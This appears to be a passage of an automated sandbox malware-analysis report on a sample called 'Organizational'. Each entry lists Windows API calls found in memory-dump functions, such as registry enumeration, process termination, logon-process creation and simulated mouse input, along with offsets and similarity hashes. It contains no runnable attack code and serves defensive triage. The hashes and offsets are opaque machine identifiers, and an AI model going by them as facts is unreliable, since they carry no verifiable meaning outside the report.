                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _memmove$__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 3253778849-0
                                                    • Opcode ID: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                                    • Instruction ID: 59e3a650ffb15590072259a86a1e666f8b9c617d030709a0e3323df9703b67af
                                                    • Opcode Fuzzy Hash: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                                    • Instruction Fuzzy Hash: 0F61CE7160025AABCF11EF60CC82EFE37A4AF45309F444558FE69AB1D2DB399C49EB50
                                                    APIs
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                      • Part of subcall function 00F7147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F7040D,?,?), ref: 00F71491
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F7091D
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F7095D
                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00F70980
                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F709A9
                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F709EC
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00F709F9
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                    • String ID:
                                                    • API String ID: 4046560759-0
                                                    • Opcode ID: 6101fc39172815dd2e7403d91c31c5dfdbd5710872ef0c3d1c9beb53b965b479
                                                    • Instruction ID: 22b7979fe22d21c156dda33a995469a00ff749b92608dbeb0d65ea9569a31e34
                                                    • Opcode Fuzzy Hash: 6101fc39172815dd2e7403d91c31c5dfdbd5710872ef0c3d1c9beb53b965b479
                                                    • Instruction Fuzzy Hash: 97516931208204EFD710EB64CC85EAABBF9FF84310F04891DF589872A2DB35E905EB52
                                                    APIs
                                                    • GetMenu.USER32(?), ref: 00F75E38
                                                    • GetMenuItemCount.USER32(00000000), ref: 00F75E6F
                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F75E97
                                                    • GetMenuItemID.USER32(?,?), ref: 00F75F06
                                                    • GetSubMenu.USER32(?,?), ref: 00F75F14
                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 00F75F65
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountMessagePostString
                                                    • String ID:
                                                    • API String ID: 650687236-0
                                                    • Opcode ID: 45b8ebacf613a465678303c30eec4d0ee8bc4f1ab3f6a4e388b0dba84b7ee61b
                                                    • Instruction ID: 312720d3f1c946cb497080554a4500ac56125b4c60aa1e078db23a0d43b97f49
                                                    • Opcode Fuzzy Hash: 45b8ebacf613a465678303c30eec4d0ee8bc4f1ab3f6a4e388b0dba84b7ee61b
                                                    • Instruction Fuzzy Hash: A951A075E00619AFCF11EF64C845AEEB7B5EF48720F10805AF905BB391CB74AE41AB91
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 00F4F6A2
                                                    • VariantClear.OLEAUT32(00000013), ref: 00F4F714
                                                    • VariantClear.OLEAUT32(00000000), ref: 00F4F76F
                                                    • _memmove.LIBCMT ref: 00F4F799
                                                    • VariantClear.OLEAUT32(?), ref: 00F4F7E6
                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00F4F814
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Variant$Clear$ChangeInitType_memmove
                                                    • String ID:
                                                    • API String ID: 1101466143-0
                                                    • Opcode ID: 3864012c9efe730f2046337b542df83ae9d8733ae71dab0fd40360961988bb1f
                                                    • Instruction ID: 5aff75e8661b54f014680dd671a9ae4180ea6c28279b38d9a9b8ae5c8e4d73aa
                                                    • Opcode Fuzzy Hash: 3864012c9efe730f2046337b542df83ae9d8733ae71dab0fd40360961988bb1f
                                                    • Instruction Fuzzy Hash: 54515BB5A00209EFDB14CF58C884AAABBB8FF4C354B15856AED59DB300D734E955CFA0
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F529FF
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F52A4A
                                                    • IsMenu.USER32(00000000), ref: 00F52A6A
                                                    • CreatePopupMenu.USER32 ref: 00F52A9E
                                                    • GetMenuItemCount.USER32(000000FF), ref: 00F52AFC
                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00F52B2D
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                    • String ID:
                                                    • API String ID: 3311875123-0
                                                    • Opcode ID: 60ca0d53fcf6f86029bd6924854c310e7d26369ea9b9ed8a858609051b58fa2c
                                                    • Instruction ID: 51a6e779898ac0ce24e5b461ba7a2349fcb15ce373eaab4a710ee9ba8c815869
                                                    • Opcode Fuzzy Hash: 60ca0d53fcf6f86029bd6924854c310e7d26369ea9b9ed8a858609051b58fa2c
                                                    • Instruction Fuzzy Hash: 2951D470A00309EFCF65CF68C888BAEBBF5EF46325F144219EE119B291D7749948EB51
                                                    APIs
                                                      • Part of subcall function 00EF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00EF29F3
                                                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 00EF1B76
                                                    • GetWindowRect.USER32(?,?), ref: 00EF1BDA
                                                    • ScreenToClient.USER32(?,?), ref: 00EF1BF7
                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00EF1C08
                                                    • EndPaint.USER32(?,?), ref: 00EF1C52
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                    • String ID:
                                                    • API String ID: 1827037458-0
                                                    • Opcode ID: dc1b90ab0138d0010f27115571cdff4906bb72be687f60774869df7f311fd57a
                                                    • Instruction ID: fc5aa52f63e22d5143d159c311a0b08a9b1e83bc5bd353dda967ae9585a9adb3
                                                    • Opcode Fuzzy Hash: dc1b90ab0138d0010f27115571cdff4906bb72be687f60774869df7f311fd57a
                                                    • Instruction Fuzzy Hash: A041AF31104309EFD710EF24DC88FBA7BE8EB85764F1406A9FA99972A1C7309805EB61
                                                    APIs
                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,00F6550C,?,?,00000000,00000001), ref: 00F67796
                                                      • Part of subcall function 00F6406C: GetWindowRect.USER32(?,?), ref: 00F6407F
                                                    • GetDesktopWindow.USER32 ref: 00F677C0
                                                    • GetWindowRect.USER32(00000000), ref: 00F677C7
                                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00F677F9
                                                      • Part of subcall function 00F557FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F55877
                                                    • GetCursorPos.USER32(?), ref: 00F67825
                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00F67883
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                    • String ID:
                                                    • API String ID: 4137160315-0
                                                    • Opcode ID: 66dc501b104f617e2f543612b9ce0a017a3ee779e833ff53e55a25c074676624
                                                    • Instruction ID: 1773e911c3d323d226e98ad9889d7f6b5db3d57c63147d9de50ac62cd4c00fa9
                                                    • Opcode Fuzzy Hash: 66dc501b104f617e2f543612b9ce0a017a3ee779e833ff53e55a25c074676624
                                                    • Instruction Fuzzy Hash: 8131B072508309ABD720EF24DC49FABB7A9FF88714F100919F59997191DB34E908DBA2
                                                    APIs
                                                      • Part of subcall function 00F48CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F48CDE
                                                      • Part of subcall function 00F48CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F48CE8
                                                      • Part of subcall function 00F48CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F48CF7
                                                      • Part of subcall function 00F48CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F48CFE
                                                      • Part of subcall function 00F48CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F48D14
                                                    • GetLengthSid.ADVAPI32(?,00000000,00F4904D), ref: 00F49482
                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00F4948E
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00F49495
                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00F494AE
                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00F4904D), ref: 00F494C2
                                                    • HeapFree.KERNEL32(00000000), ref: 00F494C9
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                    • String ID:
                                                    • API String ID: 3008561057-0
                                                    • Opcode ID: 28af2974835b056ad58e1cf806b382bde2e65a1bfbd18c7238b46eec6dc21e80
                                                    • Instruction ID: 4fed96912b88a70a14a0f9be0c1274fe9441fb1134eda0a76d3486cfa1db5c55
                                                    • Opcode Fuzzy Hash: 28af2974835b056ad58e1cf806b382bde2e65a1bfbd18c7238b46eec6dc21e80
                                                    • Instruction Fuzzy Hash: D811AF32A05608EFDB50DFA4CC49BFF7BA9EB45325F508058EC4597260CB799905EB60
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00F49200
                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00F49207
                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00F49216
                                                    • CloseHandle.KERNEL32(00000004), ref: 00F49221
                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F49250
                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00F49264
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                    • String ID:
                                                    • API String ID: 1413079979-0
                                                    • Opcode ID: 03bf954ec50b0c319e0b09a4fc39818a87b4b63e62de7519eb94572dc61a44b1
                                                    • Instruction ID: ba98c8524a4653a9992c2b5be369d1d2eb7a36f983e00939275deba17347bdfc
                                                    • Opcode Fuzzy Hash: 03bf954ec50b0c319e0b09a4fc39818a87b4b63e62de7519eb94572dc61a44b1
                                                    • Instruction Fuzzy Hash: CC11597260520EBBDF418F94ED49FEE7BA9EF48314F044014FE04A2160D7B69E64EB60
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 00F4C34E
                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00F4C35F
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F4C366
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00F4C36E
                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00F4C385
                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 00F4C397
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CapsDevice$Release
                                                    • String ID:
                                                    • API String ID: 1035833867-0
                                                    • Opcode ID: 8a5a01f602a119b54e473a56bc1b312cb6552dc5d94ca61015641113dfaed070
                                                    • Instruction ID: 7590a860a79608f3ea3132b3b540e81ce4764a474bd6f1587324b349b9eafcd4
                                                    • Opcode Fuzzy Hash: 8a5a01f602a119b54e473a56bc1b312cb6552dc5d94ca61015641113dfaed070
                                                    • Instruction Fuzzy Hash: 59014875E01319BBDF505FA59C49A6EBFB8EF48761F004065FE04A7250DA709D14DF90
                                                    APIs
                                                      • Part of subcall function 00EF16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00EF1729
                                                      • Part of subcall function 00EF16CF: SelectObject.GDI32(?,00000000), ref: 00EF1738
                                                      • Part of subcall function 00EF16CF: BeginPath.GDI32(?), ref: 00EF174F
                                                      • Part of subcall function 00EF16CF: SelectObject.GDI32(?,00000000), ref: 00EF1778
                                                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00F7C57C
                                                    • LineTo.GDI32(00000000,00000003,?), ref: 00F7C590
                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F7C59E
                                                    • LineTo.GDI32(00000000,00000000,?), ref: 00F7C5AE
                                                    • EndPath.GDI32(00000000), ref: 00F7C5BE
                                                    • StrokePath.GDI32(00000000), ref: 00F7C5CE
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                    • String ID:
                                                    • API String ID: 43455801-0
                                                    • Opcode ID: 08b65e22bca0fb5807e840679341d94702640975e763d2046389289a70a6c4ce
                                                    • Instruction ID: 0b64f4153ccb0b3ae948bb873961105636ca093385a1d629c78baddce1a4e870
                                                    • Opcode Fuzzy Hash: 08b65e22bca0fb5807e840679341d94702640975e763d2046389289a70a6c4ce
                                                    • Instruction Fuzzy Hash: 5B11CC7640410DBFDF129F90DC88EEA7FADEF04364F048155BA185A1A0D771AD59EBA0
                                                    APIs
                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F107EC
                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00F107F4
                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F107FF
                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F1080A
                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00F10812
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F1081A
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Virtual
                                                    • String ID:
                                                    • API String ID: 4278518827-0
                                                    • Opcode ID: 929bf9e1c727372f44995652ab55c2530a4dbff37264da3bde72de4ba6b9d1d7
                                                    • Instruction ID: dda21fdf5d919ecb9232fb8cec6a45635b2e30a4347c5cb9817ffd475075c6b2
                                                    • Opcode Fuzzy Hash: 929bf9e1c727372f44995652ab55c2530a4dbff37264da3bde72de4ba6b9d1d7
                                                    • Instruction Fuzzy Hash: 92016CB09017597DE3008F5A8C85B52FFA8FF59354F00411BA15C47941C7F5A868CBE5
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F559B4
                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F559CA
                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00F559D9
                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F559E8
                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F559F2
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F559F9
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                    • String ID:
                                                    • API String ID: 839392675-0
                                                    • Opcode ID: 37ccab93f5c658b9bae5f61c29344ec06df0ca644c3e432e4c5dc504005c158b
                                                    • Instruction ID: 88d5c626d256945597f8b3d9c77b74b7860d1b2d1f48c732dc879c2f3773a497
                                                    • Opcode Fuzzy Hash: 37ccab93f5c658b9bae5f61c29344ec06df0ca644c3e432e4c5dc504005c158b
                                                    • Instruction Fuzzy Hash: D4F0903224055CBBE3615B929C0DEFF7B3CEFC6B21F400159FA0091050EBA01A15A7B5
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,?), ref: 00F577FE
                                                    • EnterCriticalSection.KERNEL32(?,?,00EFC2B6,?,?), ref: 00F5780F
                                                    • TerminateThread.KERNEL32(00000000,000001F6,?,00EFC2B6,?,?), ref: 00F5781C
                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00EFC2B6,?,?), ref: 00F57829
                                                      • Part of subcall function 00F571F0: CloseHandle.KERNEL32(00000000,?,00F57836,?,00EFC2B6,?,?), ref: 00F571FA
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F5783C
                                                    • LeaveCriticalSection.KERNEL32(?,?,00EFC2B6,?,?), ref: 00F57843
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                    • String ID:
                                                    • API String ID: 3495660284-0
                                                    • Opcode ID: 068d2e608ec54031d747a757b9951c904c9743d8447e3f7acf6caa181f5b0dd3
                                                    • Instruction ID: 42b3695d7f8abb77005ae366aa6ff5d664f489ae869f233b33bcd7fd1327024d
                                                    • Opcode Fuzzy Hash: 068d2e608ec54031d747a757b9951c904c9743d8447e3f7acf6caa181f5b0dd3
                                                    • Instruction Fuzzy Hash: 1FF05E32545616ABD7912B64EC8CAFB772AFF45312B940421F602950A0CFB55809EB60
                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F49555
                                                    • UnloadUserProfile.USERENV(?,?), ref: 00F49561
                                                    • CloseHandle.KERNEL32(?), ref: 00F4956A
                                                    • CloseHandle.KERNEL32(?), ref: 00F49572
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00F4957B
                                                    • HeapFree.KERNEL32(00000000), ref: 00F49582
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                    • String ID:
                                                    • API String ID: 146765662-0
                                                    • Opcode ID: 00a405d97f808a652a06a455942de6acbd597c6577ce1c5a1df5beb143c92ea1
                                                    • Instruction ID: d9e153c113a9c0f212b3d47c3b6a97d67d827fd7ff65c0b3d187ff06b8109d79
                                                    • Opcode Fuzzy Hash: 00a405d97f808a652a06a455942de6acbd597c6577ce1c5a1df5beb143c92ea1
